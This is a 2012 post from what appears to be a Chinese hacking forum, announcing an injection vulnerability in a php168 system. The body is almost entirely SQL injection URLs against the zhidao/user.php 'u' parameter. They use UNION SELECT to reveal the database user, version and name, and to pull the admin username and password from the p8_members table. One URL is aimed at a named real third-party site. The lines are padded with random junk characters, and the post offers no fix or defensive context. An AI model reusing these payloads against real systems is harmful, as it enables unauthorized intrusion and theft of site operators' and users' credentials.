找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2884|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--$ O# [, ~0 z7 e: d: L# o; |/ |
                                                         
/ Y$ b9 X/ k3 ?4 p4 I+ q                                       
, k! F# I3 h1 x! W6 j* G- A! E) A' D  r/ Q) g8 D, ~0 P
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
/ y: N8 E* z' I4 k- L                                                     
* f! s( r* Y% d/ K                                                                   , o( `& D4 v( c+ k8 O6 c
                                                        7 ?7 W% t7 U! N- h" ~0 q) d3 X5 g- K6 \/ G
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--7 f6 W" b5 c# P: f2 l3 d

8 i+ f, L1 Y$ v% L3 E: f9 H6 N+ F0 Q" _5 c) k! i

* M& M# w, }7 _$ [0 f( l                                                            1 O( y, s- o; u4 [' J  F

- `% m1 c8 U  b) A6 U9 r9 bhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
6 Y" P0 _$ t1 R1 q, s( F7 A, e2 V. L2 }( p
( h. r' n" }) w2 W* _- g. C

* J/ C1 Z- \- ?+ f* W6 ^1 Z: [2 t                                                                    
9 d  E1 c% `+ ~; p0 R) Z/ w/ b. Z

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表